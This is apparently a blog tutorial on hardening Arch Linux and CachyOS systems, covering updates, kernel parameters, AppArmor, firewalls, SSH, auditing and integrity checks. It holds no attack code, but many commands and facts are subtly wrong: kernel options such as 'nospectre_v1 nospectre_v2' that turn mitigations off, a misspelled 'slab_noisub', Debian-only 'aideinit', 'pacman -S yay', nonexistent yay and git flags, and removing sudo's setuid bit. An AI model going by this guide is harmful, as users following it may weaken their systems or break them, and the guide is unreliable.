Secure Your Arch Linux System: Complete Hardening Guide (Part 2)

Distribution Specific: Arch Linux & CachyOS

This is Part 2 of our Linux hardening guide, specifically for Arch Linux, CachyOS, Manjaro, and other Arch-based distributions. If you’re on Debian/Ubuntu, see Part 1: Hardening Debian/Ubuntu Systems.

Arch-based systems require different package managers (pacman instead of apt) and have unique security considerations. This guide covers hardening techniques specific to the Arch ecosystem.

Why Arch Hardening is Different

1. Initial System Setup

Update System

sudo pacman -Syu
sudo pacman -S base-devel  # Essential for building packages

Enable Parallel Downloads

sudo nano /etc/pacman.conf

# Uncomment or add:
ParallelDownloads = 5

sudo pacman -Syu

Configure Automatic Updates

sudo pacman -S pacman-contrib

# Create update script
sudo nano /usr/local/bin/auto-update.sh

#!/bin/bash
/usr/bin/pacman -Syu --noconfirm
/usr/bin/pacman -Sc --noconfirm  # Clean cache

# Make executable
sudo chmod +x /usr/local/bin/auto-update.sh

# Schedule with systemd timer
sudo systemctl enable pacman-update.timer

Create timer:

sudo nano /etc/systemd/system/pacman-update.service

[Unit]
Description=Automatic pacman update
After=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/local/bin/auto-update.sh

[Install]
WantedBy=multi-user.target

Timer:

sudo nano /etc/systemd/system/pacman-update.timer

[Unit]
Description=Daily pacman update
Requires=pacman-update.service

[Timer]
OnBootSec=15min
OnUnitActiveSec=1d
AccuracySec=12h

[Install]
WantedBy=timers.target

Enable:

sudo systemctl daemon-reload
sudo systemctl enable pacman-update.timer
sudo systemctl start pacman-update.timer

Set Timezone and NTP

sudo timedatectl set-timezone UTC
sudo timedatectl set-ntp true
timedatectl status

2. Kernel Hardening (CachyOS Specific)

Switch to CachyOS Kernel

CachyOS provides hardened kernel builds:

# Add CachyOS repository
echo '[cachyos]
Server = https://mirror.cachyos.org/cachyos/$arch
Server = https://cachyos.org/cachyos/$arch' | sudo tee -a /etc/pacman.conf

# Key setup
sudo pacman-key --recv-keys F3B607488DB35A47
sudo pacman-key --lsign-key F3B607488DB35A47

# Install CachyOS kernel
sudo pacman -Syu
sudo pacman -S linux-cachyos linux-cachyos-headers

Kernel Parameters (Secure Boot)

# Edit kernel parameters
sudo nano /etc/kernel/cmdline

# Add security parameters:
quiet splash audit=1 apparmor=1 security=apparmor page_poison=1 slab_noisub slub_debug=P pti=on vsyscall=none spec_store_bypass_disable=on l1tf=full nospectre_v1 nospectre_v2 kpti=1 spectre_v2_user=force msr.allow_writes=off

# Rebuild initramfs
sudo mkinitcpio -P

# For GRUB systems
sudo nano /etc/default/grub
GRUB_CMDLINE_LINUX="... audit=1 apparmor=1"
sudo grub-mkconfig -o /boot/grub/grub.cfg

Check Security Settings

# Verify hardened kernel
zcat /proc/config.gz | grep -i security

# Check SMEP/SMAP
grep smep /proc/cpuinfo
grep smap /proc/cpuinfo

3. AppArmor Installation

Arch uses AppArmor instead of SELinux (more common on Fedora):

# Install AppArmor
sudo pacman -S apparmor

# Enable in kernel (should be default on CachyOS)
grep apparmor /proc/cmdline

# Start AppArmor service
sudo systemctl start apparmor
sudo systemctl enable apparmor

# Check status
sudo aa-status

# Load profile for common services
sudo aa-enforce /etc/apparmor.d/usr.bin.man

4. User and Group Management

Disable Root Login

# Lock root account
sudo passwd -l root

# Or set impossible password
sudo usermod -p '!' root

Create Non-Root User

sudo useradd -m -s /bin/bash -G wheel,audio,video newuser
sudo passwd newuser

# Set sudo without password (for specific commands)
sudo visudo

# Add line:
newuser ALL=(ALL) NOPASSWD: /usr/bin/systemctl
deploy ALL=(ALL) NOPASSWD: /usr/bin/docker

5. Filesystem Hardening

Mount Options

Arch uses systemd-managed mounts:

# Edit fstab
sudo nano /etc/fstab

# Apply security options:
/dev/sda1 /boot        ext4 defaults,ro,nodev,nosuid,noexec
/dev/sda2 /            ext4 defaults,nodev
/dev/sda3 /tmp         tmpfs defaults,nodev,nosuid,noexec,size=2G
/dev/sda4 /var         ext4 defaults,nodev
/dev/sda5 /var/tmp     tmpfs defaults,nodev,nosuid,noexec,size=2G
/dev/sda6 /var/log     ext4 defaults,nodev,nosuid,noexec
/dev/sda7 /home        ext4 defaults,nodev,nosuid

Permission Hardening

# Critical files
sudo chmod 600 /etc/shadow
sudo chmod 644 /etc/passwd
sudo chmod 000 /etc/gshadow
sudo chmod 644 /etc/group

# SUID binaries check
sudo find / -perm -4000 2>/dev/null
sudo find / -perm -2000 2>/dev/null

# Remove unnecessary SUID
sudo chmod u-s /usr/bin/sudo  # Only if using doas

6. Network Hardening

Enable UFW Firewall

# Install UFW
sudo pacman -S ufw

# Enable
sudo systemctl enable ufw
sudo systemctl start ufw

# Default policy
sudo ufw default deny incoming
sudo ufw default allow outgoing

# Allow services
sudo ufw allow ssh
sudo ufw allow http
sudo ufw allow https

# Status
sudo ufw status

Kernel Hardening Parameters

# Create sysctl config
sudo nano /etc/sysctl.d/99-hardening.conf

# Disable IP forwarding (unless router)
net.ipv4.ip_forward = 0
net.ipv6.conf.all.forwarding = 0

# Disable ICMP redirects
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0

# Enable SYN cookies
net.ipv4.tcp_syncookies = 1

# Reverse path filtering
net.ipv4.conf.all.rp_filter = 1

# Disable source packet routing
net.ipv4.conf.all.send_redirects = 0

# Disable ICMP
net.ipv4.icmp_echo_ignore_all = 1

# TCP hardening
net.ipv4.tcp_timestamps = 1
net.ipv4.tcp_rfc1337 = 1

# Apply
sudo sysctl -p /etc/sysctl.d/99-hardening.conf

7. AUR Security

The AUR contains community-maintained packages with varying security levels:

Before Installing from AUR

# Review PKGBUILD
git clone https://aur.archlinux.org/yay.git
cd yay
cat PKGBUILD  # Examine before building

# Check for common red flags:
# - Network calls during build
# - Cryptographic checks bypassed
# - Suspicious dependencies
# - Requires root during build

Use AUR Helpers Safely

# Install yay (AUR helper)
sudo pacman -S yay

# Review before installing
yay -Syu --devel --timeupdate  # Build check

# Keep AUR packages updated
yay -Syu --aur

Avoid Problematic AUR Packages

# Check download statistics
yay -S package_name --stats

# Look at recent changes
git log --oneline --n 10 PKGBUILD

# Verify signatures
gpg --verify package.tar.gz.sig package.tar.gz

8. SSH Hardening (Arch-specific)

# Install SSH
sudo pacman -S openssh

# Configure SSH
sudo nano /etc/ssh/sshd_config

Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
X11Forwarding no
AllowUsers deploy testuser
HostKey /etc/ssh/ssh_host_ed25519_key

# Use strong ciphers (Arch has modern OpenSSH)
Ciphers aes-256-ctr,aes-192-ctr
KexAlgorithms curve25519-sha256

# Enable service
sudo systemctl enable sshd
sudo systemctl start sshd

# Verify config
sudo sshd -t

Fail2Ban (Arch version)

# Install fail2ban
sudo pacman -S fail2ban

# Configure
sudo nano /etc/fail2ban/jail.local

[DEFAULT]
bantime = 3600
findtime = 3600
maxretry = 3

[sshd]
enabled = true
port = 2222
filter = sshd
logpath = /var/log/auth.log

# Enable service
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

# Monitor
sudo tail -f /var/log/fail2ban.log

9. Auditing and Logging

Auditd Setup

# Install auditd
sudo pacman -S audit

# Start service
sudo systemctl enable auditd
sudo systemctl start auditd

# Configure rules
sudo nano /etc/audit/rules.d/audit.rules

# Monitor sudo changes
-w /etc/sudoers -p wa -k sudoers_changes

# Monitor system calls
-a always,exit -F arch=b64 -S adjtimex,settimeofday -k time-change

# Monitor user/group changes
-w /etc/group -p wa -k identity
-w /etc/passwd -p wa -k identity

# Load rules
sudo augenrules --load

# Check logs
sudo ausearch -k sudoers_changes

systemd Journal Hardening

# Configure persistent logging
sudo mkdir -p /var/log/journal

# Set permissions
sudo nano /etc/systemd/journald.conf

Storage=persistent
Compress=yes
Seal=yes
Audit=yes
MaxLevelStore=debug
RateLimitBurst=10000

# Restart journal service
sudo systemctl restart systemd-journald

# Query logs
journalctl --boot
journalctl -u sshd -n 10
journalctl -p err -f

10. File Integrity Monitoring

AIDE Setup

# Install AIDE
sudo pacman -S aide

# Initialize database
sudo aideinit

# Regular checks
sudo aide --check

# Automated checking
sudo systemctl enable aide.timer
sudo systemctl start aide.timer

tripwire Alternative

# From AUR
yay -S tripwire

# Initialize
sudo tripwire --init
sudo tripwire --check

11. PAM Configuration

Password Security

# Install cracklib for strong passwords
sudo pacman -S cracklib

# Configure PAM
sudo nano /etc/security/pwquality.conf

minlen = 14
dcredit = -1
ucredit = -1
ocredit = -1
lcredit = -1
difok = 4
maxrepeat = 3

12. Antivirus and Malware Scanning

ClamAV Setup

# Install ClamAV
sudo pacman -S clamav clamav-daemon

# Update virus definitions
sudo freshclam

# Scan system
clamscan -r /home

# Enable daemon
sudo systemctl enable clamav-daemon
sudo systemctl start clamav-daemon

13. Security Auditing Tools

Lynis Security Audit

# Install from AUR
yay -S lynis

# Run audit
sudo lynis audit system --quick

# Generate report
sudo lynis audit system --quiet > report.txt

rootkit Hunters

# Install rkhunter
sudo pacman -S rkhunter

# Update database
sudo rkhunter --update

# Scan
sudo rkhunter --check --skip-warnings

14. Firewall Rules (Advanced)

nftables Configuration

# Modern firewall alternative to iptables
sudo pacman -S nftables

# Basic configuration
sudo nano /etc/nftables.conf

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;
        
        ct state established,related accept
        iifname lo accept
        ip protocol icmp accept
        tcp dport ssh accept
        tcp dport 80 accept
        tcp dport 443 accept
    }
    
    chain forward {
        type filter hook forward priority 0; policy drop;
    }
    
    chain output {
        type filter hook output priority 0; policy accept;
    }
}

# Enable
sudo systemctl enable nftables
sudo systemctl start nftables

15. Regular Maintenance

Weekly Tasks

# Check system status
sudo systemctl status audit
sudo systemctl status apparmor
sudo systemctl status ufw

# Review logs
journalctl -p err --since "1 week ago"
sudo ausearch -m AVC

# Update AUR packages
yay -Syu --aur

Monthly Tasks

# AIDE/Tripwire check
sudo aide --check

# Security audit
sudo lynis audit system --quick

# Remove orphaned packages
pacman -Qtd

# Check for vulnerable packages
sudo pacman -U "url"  # After checking advisories

CachyOS Specific Optimizations

Kernel Parameters for CachyOS

# CachyOS comes with many hardening features enabled
# Check current configuration:
cat /proc/cmdline

# Monitor CachyOS-specific features:
grep cachos /etc/os-release

Update CachyOS Packages

# CachyOS-specific packages are optimized
sudo pacman -S linux-cachyos  # Hardened kernel
sudo pacman -S cachyos-settings  # Official optimizations

# Check for updates
sudo pacman -Syu

Security Checklist

Troubleshooting

Check Security Status

# Kernel hardening
zcat /proc/config.gz | grep -i security

# AppArmor status
sudo aa-status

# Audit status
sudo systemctl status auditd

# Firewall status
sudo ufw status

Common Issues

# AppArmor conflicts
sudo aa-complain /etc/apparmor.d/usr.sbin.service

# Auditd running but not logging
sudo systemctl restart auditd

# UFW blocking legitimate traffic
sudo ufw status numbered
sudo ufw delete [number]

Resources

Conclusion

Arch Linux and CachyOS provide excellent platforms for hardening with their rolling release cycle and modern security features. The key is understanding the differences from Debian-based systems and leveraging Arch-specific tools and configurations.

Start with kernel hardening and AppArmor, then progress to advanced auditing and firewall configuration based on your specific needs.

Next Steps

  1. Install on CachyOS for maximum hardening out-of-box
  2. Enable AppArmor profiles for critical services
  3. Configure auditd for monitoring
  4. Regularly review and update security rules
  5. Contribute hardened PKGBUILD profiles to AUR